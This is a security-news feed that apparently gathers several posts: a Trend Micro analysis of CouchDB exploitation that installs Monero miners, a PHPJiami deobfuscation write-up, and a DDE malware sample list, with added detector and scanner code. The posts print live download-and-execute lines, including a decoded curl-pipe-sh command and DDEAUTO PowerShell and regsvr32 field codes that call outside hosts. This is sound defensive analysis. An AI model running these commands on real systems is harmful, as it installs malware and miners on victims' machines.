
Intel didn't tell CERTS, govs, about Meltdown and Spectre because they couldn't help fix it

Letters to Congress detail the plan to keep CPU flaws secret

Letters sent to the United States Congress by Intel and the other six companies in the Meltdown/Spectre disclosure cabal have revealed how and why they didn't inform the wider world about the dangerous chip design flaws.…

Posted: 23 Feb 2018 | 12:30 am

How one guy could have taken over any Tinder account (but didn’t)

The potential outcome of the Tinder security hole - complete account takeover, with a crook logged in as you

Posted: 22 Feb 2018 | 5:43 am

Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

by Hubert Lin

Attacks abusing cryptocurrency miners have been on an upswing, in large part because of the growing popularity of digital currencies. Based on data from sensors we deployed worldwide, we have observed a new attack that exploits two vulnerabilities in a popular database system to deliver miners for the Monero cryptocurrency (detected by Trend Micro as HKTL_COINMINE.GE, HKTL_COINMINE.GP, and HKTL_COINMINE.GQ). In this instance the target is Apache CouchDB, an open source database management system designed to combine a scalable architecture with an easy-to-use interface.

The two vulnerabilities we found being exploited are:

CVE-2017-12635, a privilege escalation. CouchDB's Erlang-based and JavaScript-based JSON parsers handle duplicate keys differently, so a _users document that carries the roles key twice passes validation with one value but is stored with the other. An attacker can thereby grant an account any role, including the special _admin role that marks administrative users.

CVE-2017-12636, remote command execution. An administrator can change CouchDB's query server configuration over HTTP, and the program configured there is run by the server as the database system user. Chained with the first bug, this lets an unauthenticated attacker execute arbitrary code.

Both vulnerabilities were patched in November 2017 (CouchDB 1.7.0 and 2.1.1).

By default, CouchDB listens on port 5984/TCP. According to our sensors, malicious activity peaked in early February:

Figure 1: Chart showing the detection of potential attacks; early February was when the peaks occurred

Based on the packet traces below, CVE-2017-12635 is exploited first to create a CouchDB account with administrator rights.

Figure 2: Packet traces we found that show exploitation of CVE-2017-12635

That administrator account is then used to authenticate and exploit the remote command execution vulnerability CVE-2017-12636:


Figure 3: Exploitation of CVE-2017-12636 using the account with administrative rights

In this scenario, the Authorization header value dG9wa2VrMTEyOnRvcGtlazExMg== is HTTP Basic authentication; base64-decoded it yields the credentials topkek112:topkek112.

The string Y3VybCBodHRwOi8vOTQuMjUwLjI1My4xNzgvbG9nbzYuanBnfHNo, sent as the query server definition, base64-decodes to a one-liner: curl hxxp://94.250.253.178/logo6.jpg|sh

This downloads logo6.jpg, which is actually a Bourne shell script that performs several actions.

First, it kills any competing miners already running, so that the malware is the only cryptocurrency miner on the system. Some examples include the following:

It then downloads and executes the cryptomining executable and its configuration:

Finally, it maintains persistence on the device by installing cron jobs:
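The HTTP half of that chain (an unauthenticated _users write with a duplicated roles key, then an authenticated write to the query_servers configuration) is easy to pick out of proxy or packet-capture logs once the duplicate-key trick is accounted for. The Python detector below is an added example, not Trend Micro's code. Its request records are constructed here, modelled on the traffic the post describes: the credentials and the command string are the post's own decoded values, the exact body of the _users document is an assumption, and the /_node/<name>/_config path is the CouchDB 2.x layout of /_config.

```python
# Added example: flag the CVE-2017-12635 / CVE-2017-12636 request pattern in
# HTTP access records. Not Trend Micro's code; the records are constructed.
import base64
import json
import re

# Paths the two steps hit. /_node/<name>/_config is the CouchDB 2.x form of
# /_config (assumption: the post's traces do not show which layout was used).
USERS_RE = re.compile(r"^/_users/org\.couchdb\.user:")
QUERY_SERVERS_RE = re.compile(r"^(?:/_node/[^/]+)?/_config/query_servers/")


def parse_json_all_pairs(body):
    """json.loads that also returns duplicate keys and every (key, value) pair.

    Ordinary parsers keep one value per key and hide the other; that is the
    ambiguity CVE-2017-12635 exploited (CouchDB's JavaScript validator saw the
    last "roles", the Erlang side used the first). A detector has to see both.
    """
    dupes, pairs_seen = [], []

    def hook(pairs):
        keys = [k for k, _ in pairs]
        dupes.extend(sorted({k for k in keys if keys.count(k) > 1}))
        pairs_seen.extend(pairs)
        return dict(pairs)  # last value wins, as in JavaScript

    return json.loads(body, object_pairs_hook=hook), dupes, pairs_seen


def decode_basic_auth(header):
    """Return 'user:password' from a Basic Authorization header, else None."""
    if not header or not header.lower().startswith("basic "):
        return None
    try:
        token = header.split(None, 1)[1].strip()
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (ValueError, IndexError):
        return None


def analyse(req):
    """Findings for one record of the form {method, path, headers, body}."""
    findings = []
    method, path, body = req["method"], req["path"], req.get("body", "")
    if method == "PUT" and USERS_RE.match(path):
        try:
            _, dupes, pairs = parse_json_all_pairs(body)
        except json.JSONDecodeError:
            return ["_users write with unparseable JSON body"]
        if "roles" in dupes:
            findings.append("CVE-2017-12635 pattern: duplicate 'roles' key in _users document")
        if any(k == "roles" and isinstance(v, list) and "_admin" in v for k, v in pairs):
            findings.append("_users document grants itself the _admin role")
    if method == "PUT" and QUERY_SERVERS_RE.match(path):
        findings.append("CVE-2017-12636 pattern: write to query_servers config")
        creds = decode_basic_auth(req.get("headers", {}).get("Authorization"))
        if creds:
            findings.append("authenticated as " + creds.split(":", 1)[0])
        try:
            value = json.loads(body)  # the config value is a JSON string
        except json.JSONDecodeError:
            value = body
        if isinstance(value, str):
            findings.append("query server command: " + value)
    return findings


def scan(requests):
    """Map record index -> findings, leaving clean records out."""
    report = {}
    for i, req in enumerate(requests):
        findings = analyse(req)
        if findings:
            report[i] = findings
    return report


# Constructed records modelled on the traffic the post describes. The
# credentials and the command are the post's own decoded strings; the shape
# of the _users document body is an assumption.
SAMPLE_REQUESTS = [
    {"method": "PUT", "path": "/_users/org.couchdb.user:topkek112", "headers": {},
     "body": '{"type":"user","name":"topkek112","roles":["_admin"],"roles":[],'
             '"password":"topkek112"}'},
    {"method": "PUT", "path": "/_config/query_servers/cmd",
     "headers": {"Authorization": "Basic dG9wa2VrMTEyOnRvcGtlazExMg=="},
     "body": '"curl http://94.250.253.178/logo6.jpg|sh"'},
    {"method": "GET", "path": "/appdb/_all_docs", "headers": {}, "body": ""},
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS).items():
        print(SAMPLE_REQUESTS[i]["method"], SAMPLE_REQUESTS[i]["path"])
        for finding in findings:
            print("   -", finding)
```

The point of parse_json_all_pairs is that a plain json.loads would have hidden the attack the same way CouchDB's validator did: it keeps one value per key and drops the other without a word, so a rule that only inspects the parsed roles list sees an empty list and passes the request.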

Vulnerabilities as a Gateway to Cryptocurrency Mining

Cryptocurrencies have taken center stage recently, as prices hit both highs and lows: Bitcoin peaked at US$20,000 in December 2017 and dropped below US$6,000 just over a month later. And they haven’t been gaining attention from mainstream media and users alone — cybercriminals have also taken notice, seeing cryptocurrency mining as a potentially lucrative income source.

This has resulted in the increase of attacks meant to mine cryptocurrencies. What’s more, many of the victims are unaware that their resources are being used, as device slowdowns and sluggishness can often be attributed to causes other than malware or vulnerability exploitation.

Mining requires a significant amount of computational power and hardware to be profitable, so many attackers exploit flaws and vulnerabilities in organizations, where resources are plentiful, to harness their systems and devices.

CouchDB is relatively popular (it ranked 28th out of 300 in the DB-Engines ranking of database management systems) and is used by some large organizations, notably the British Broadcasting Corporation (BBC) for its content platforms, so attackers gain access to a fairly large active pool of resources for their mining operations. In our view, however, the system being targeted matters less than the existence of an exploitable vulnerability. Whether it is CouchDB or another database such as MongoDB, as long as there is a chance to exploit an RCE (remote code execution) flaw, threat actors will take it, because RCE lets them run whatever code they want on the host. For such access, a cryptocurrency miner is a low-risk, potentially high-reward payload. We surmise that CouchDB was targeted because of these vulnerabilities rather than any special feature the system provides.

Mitigation and Prevention

Cryptocurrency miners not only degrade system performance but also expose organizations and users to a plethora of further problems, from information theft to additional malware.

Fortunately, the impact of many of these miners can be mitigated through relatively simple steps that are part of standard security best practices: applying the November 2017 CouchDB patches, keeping port 5984/TCP off untrusted networks, and watching for unexpected cron jobs and sustained CPU usage on database hosts.

Trend Micro Solutions

Trend Micro™ XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today's purpose-built threats that bypass traditional controls or exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro's suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Trend Micro™ Deep Security protects user systems from any threat that might target the aforementioned vulnerabilities via the following DPI rules:

Trend Micro™ TippingPoint™ customers are protected from threats that might exploit the vulnerabilities via these MainlineDV filters:

Trend Micro™ Smart Home Network customers are protected from this threat via these rules:

Indicators of Compromise (IoCs):

Hash Detected as HKTL_COINMINE.GE

• 63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017

Hash Detected as HKTL_COINMINE.GP

• 8bf1def5479b39376b3790a83380831d288c57dd4fbad8e64abc3a9062eb56bb

Hash Detected as HKTL_COINMINE.GQ

• 5bb66a5e9a7f6c76325a55b7a4a3128fc8631805676bbd3315ce2ac04ac2937b

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Posted: 15 Feb 2018 | 5:00 am

Comment on Cyberbullying – Where Did It All Start? by person

I’m so sorry for you.

Posted: 5 Feb 2018 | 7:46 am

Deobfuscating PHPJiami

I was sent a PHP script protected by PHPJiami, which you can find here. PHPJiami is a decent PHP obfuscator that appears to be able to bypass several online deobfuscators. Here's what the script looks like:

When you run it, you can see what the protected script does.

At the top there’s a comments section. Let me change the uppercase “P” in “PHP” to lowercase.

Now when I run the script, nothing happens. This means there's some kind of anti-tampering function in the script.

Let me clean up the script so we can see what it’s doing. If you look at the second function, you can see what looks like variable assignments.

At the bottom of the script, you can see a blob of obfuscated text. This is probably where the prize is.

After studying this a bit, I go back up to the second function and echo out the variables to see what they contain (see the comments). That last line is interesting, as it reads a copy of itself.

The section right below that has some interesting variables as well. It looks like it's using MD5 to ensure the script hasn't been modified. If the check passes, the blob at the bottom gets uncompressed, rot13'd, etc.

Although I only have a brief understanding of what the script does, I think I have enough to deobfuscate the blob. Since I cannot modify this script to make it cough up the prize, I can trick it into thinking that the script hasn't changed by making it read an unmodified copy of itself (I call this the "reflection technique").

Here are the two changes made to the beautified version.

On the actual script or other PHPJiami scripts, all I do is search for the string at the end of the previous line, which is ():"; and put in the reference to the original script there. From there, I search for "return" and put an echo there.

When the script is run, I get a result which looks something like this which doesn’t mean too much.

But when you view the source, you can see the original source code.
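The anti-tamper check and the reflection bypass can be modelled outside PHP. The Python script below is an added example, not PHPJiami's code or the post author's. It builds a loader that refuses to decode its payload unless the MD5 of the file it reads back matches an embedded digest, then shows that the post's one-character edit to the header comment breaks it, and that redirecting the self-read to an untouched copy restores it. The encoding pipeline (zlib, base64, rot13) and the rule for which bytes are hashed are assumptions standing in for PHPJiami's real ones; the decoded RESULT stands for the code PHPJiami would hand to eval, so reading it is the equivalent of the author's return-to-echo change.

```python
# Added example: a model of the self-hash anti-tamper check the post describes
# and the "reflection" bypass. Not PHPJiami's code; the encoding pipeline and
# the hashing rule are assumptions.
import base64
import codecs
import hashlib
import os
import tempfile
import zlib

SAMPLE_SOURCE = "print('hello from the protected script')"  # constructed payload


def pack(src):
    """Assumed protection pipeline: compress, base64, rot13 (the post only says
    the blob is uncompressed and rot13'd on the way back)."""
    return codecs.encode(base64.b64encode(zlib.compress(src.encode())).decode(), "rot13")


def unpack(blob):
    return zlib.decompress(base64.b64decode(codecs.decode(blob, "rot13"))).decode()


# The protected file: a header comment, an embedded digest, a self-read whose
# MD5 must match the digest, and the blob. The digest line itself is excluded
# from the hash so that it can be embedded (assumed rule). RESULT stands for
# the decoded code PHPJiami would hand to eval.
LOADER = '''# PHP script protected by a PHPJiami-like loader (model)
EXPECTED = {expected!r}
import base64, codecs, hashlib, zlib
_lines = open(__file__, "rb").read().split(b"\\n")
_body = b"\\n".join(l for l in _lines if not l.startswith(b"EXPECTED"))
if hashlib.md5(_body).hexdigest() != EXPECTED:
    RESULT = None  # tampered: the loader silently does nothing
else:
    RESULT = zlib.decompress(base64.b64decode(codecs.decode({blob!r}, "rot13"))).decode()
'''


def build_protected(src, path):
    """Write a protected file whose digest covers everything but the digest line."""
    blob = pack(src)
    draft = LOADER.format(expected="", blob=blob).encode()
    body = b"\n".join(l for l in draft.split(b"\n") if not l.startswith(b"EXPECTED"))
    digest = hashlib.md5(body).hexdigest()
    with open(path, "wb") as f:
        f.write(LOADER.format(expected=digest, blob=blob).encode())


def run_protected(path):
    """Execute a protected file the way the interpreter would; return RESULT."""
    ns = {"__file__": path}
    with open(path, "rb") as f:
        exec(compile(f.read(), path, "exec"), ns)
    return ns["RESULT"]


def demo():
    """Intact file decodes; the P -> p edit to the comment breaks it; pointing
    the self-read at the untouched original (reflection) fixes it again."""
    workdir = tempfile.mkdtemp()
    original = os.path.join(workdir, "protected.py")
    tampered = os.path.join(workdir, "tampered.py")
    build_protected(SAMPLE_SOURCE, original)
    with open(original, "rb") as f:
        pristine = f.read()

    edited = pristine.replace(b"# PHP", b"# php")  # the post's one-character edit
    with open(tampered, "wb") as f:
        f.write(edited)
    refused = run_protected(tampered)

    # Reflection: keep the edit, but make the integrity check read the original.
    reflected = edited.replace(b"open(__file__,", b"open(" + repr(original).encode() + b",")
    with open(tampered, "wb") as f:
        f.write(reflected)
    recovered = run_protected(tampered)
    return {"intact": run_protected(original), "tampered": refused, "reflected": recovered}


if __name__ == "__main__":
    for stage, result in demo().items():
        print("%-9s -> %r" % (stage, result))
```

The weakness the model makes visible is that the check trusts whatever path it reads; an integrity check that reads a file the analyst controls only ever proves that some file is unmodified, not that the code doing the checking is.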

I just did a quick check to see if anyone else did a deobfuscation write-up and I came across this Chinese site.

It describes a few methods but one technique they offered caught my eye:

If you execute this, you get the deobfuscated script and it’s so easy to do. Might even work on a bunch of other scripts too.

Scroll down to the very bottom and you'll see a long base64 string. If you decode this, you get the original script, which is the same version I got using my more difficult reflection technique. Oh wellz.

Always nice to have multiple methods to use since their obfuscation method will probably be upgraded in the future.

Posted: 31 Oct 2017 | 6:36 pm

DDE Command Execution malware samples

Here are a few samples related to the recent DDE command execution attacks.

10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 
10/18/2017 Inquest: Microsoft Office DDE Macro-less Command Execution Vulnerability
10/18/2017 Inquest: Microsoft Office DDE Vortex Ransomware Targeting Poland
10/16/2017 https://twitter.com/noottrak/status/919975081828261888
10/14/2017 Inquest: Microsoft Office DDE Freddie Mac Targeted Lure 
10/14/2017 Inquest: Microsoft Office DDE SEC OMB Approval Lure
10/12/2017 NViso labs: YARA DDE rules: DDE Command Execution observed in-the-wild 
10/11/2017 Talos:Spoofed SEC Emails Distribute Evolved DNSMessenger 
10/10/2017  NViso labs: MS Office DDE YARA rules
10/09/2017 Sensepost: Macro-less Code Exec in MSWord


 Download. Email me if you need the password  (updated sample pack)

File information

File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3. 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")

7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp

9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp

10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc

Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2. 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
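Every document above carries its payload in a Word field code, and in real lures the instruction is often split across several w:instrText runs, so a plain grep of document.xml for DDEAUTO can miss it. The Python scanner below is an added example, not from this post or the YARA rules it links. It builds a minimal .docx in memory (constructed, with the samples' downloader replaced by a harmless calc.exe), walks the fldChar begin / instrText / separate / end run sequence to reassemble each field, and resolves the ..\..\..\.. path trick seen in Giveaway.docx and Filings_and_Forms.docx to the binary that is actually launched.

```python
# Added example: find DDE/DDEAUTO field codes in a .docx, including fields
# split across runs. Not from the post or the YARA rules it links; the
# document scanned below is constructed in memory.
import io
import ntpath
import re
import xml.etree.ElementTree as ET
import zipfile

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def extract_field_codes(document_xml):
    """Return every field instruction in one WordprocessingML part.

    Word stores a field either as <w:fldSimple w:instr="..."/> or as the run
    sequence fldChar(begin), instrText..., fldChar(separate), result runs,
    fldChar(end). Lures split the instruction over several instrText runs, so
    the text between begin and separate/end is joined before matching.
    Nested fields are not modelled here.
    """
    root = ET.fromstring(document_xml)
    codes = [el.get(W + "instr", "") for el in root.iter(W + "fldSimple")]
    buf, in_instr = [], False
    for el in root.iter():  # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                buf, in_instr = [], True
            elif kind in ("separate", "end") and in_instr:
                codes.append("".join(buf))
                in_instr = False
        elif in_instr and el.tag == W + "instrText":
            buf.append(el.text or "")
    return codes


def scan_docx(data):
    """Return the DDE field codes found in any word/*.xml part, whitespace-normalised."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                codes = extract_field_codes(z.read(name))
            except ET.ParseError:
                continue
            for code in codes:
                norm = " ".join(code.split())
                if DDE_RE.search(norm):
                    hits.append(norm)
    return hits


def effective_target(code):
    """Resolve the program a DDE field launches. Field codes double their
    backslashes, and the dot-dot trick walks from MSWord.exe up to cmd.exe."""
    rest = DDE_RE.sub("", code, count=1).strip()
    m = re.match(r'"([^"]+)"|(\S+)', rest)
    raw = (m.group(1) or m.group(2)) if m else ""
    return ntpath.normpath(raw.replace("\\\\", "\\"))


def build_sample_docx(instr_parts):
    """Constructed minimal .docx whose single paragraph holds one field with
    its instruction spread over len(instr_parts) runs."""
    runs = ['<w:r><w:fldChar w:fldCharType="begin"/></w:r>']
    runs += ['<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % p
             for p in instr_parts]
    runs += ['<w:r><w:fldChar w:fldCharType="separate"/></w:r>',
             '<w:r><w:t>Loading...</w:t></w:r>',
             '<w:r><w:fldChar w:fldCharType="end"/></w:r>']
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>'
                % (W[1:-1], "".join(runs)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Instruction modelled on the Giveaway.docx field above, split over three runs,
# with the downloader replaced by calc.exe (constructed, harmless).
SAMPLE_PARTS = [
    " DDE",
    r'AUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" ',
    r'"/c calc.exe" "For Security Reasons"',
]

if __name__ == "__main__":
    for code in scan_docx(build_sample_docx(SAMPLE_PARTS)):
        print("field :", code)
        print("launch:", effective_target(code))
```

Headers, footers and footnotes live in their own word/*.xml parts, which is why the scanner walks every part rather than document.xml alone; the same run-splitting applies there.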

Message information

For the EDGAR campaign

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [])
by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for,
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

This is a multi-part message in MIME format.

Content-Type: multipart/alternative;

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>


Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx



for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com ( by
 AM4PR08MB2659.eurprd08.prod.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com ( by
 VI1PR08MB2670.eurprd08.prod.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com ( by
 DB3FFO11FD006.mail.protection.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> ( by
 <snip>( with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> ( by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown []) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost []) by
 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain []) by
 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
 []) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
Received: from authenticated-user (mx1.ssl-secure-mail.com [])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
received-spf: Fail (protection.outlook.com: domain of <snip> does
 not designate as permitted sender)
 receiver=protection.outlook.com; client-ip=;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
MIME-Version: 1.0

Posted: 18 Oct 2017 | 6:33 am

Stepping up security for an Internet-of-Things World

The optimistic outlook is that the internet of things will be an enabling technology that will help make the people and physical systems of the world — health care, food production, transportation, energy consumption — smarter and more efficient.

The pessimistic outlook? Hackers will have something else to hack. And consumers accustomed to adding security tools to their computers and phones should expect to adopt similar precautions with internet-connected home appliances.

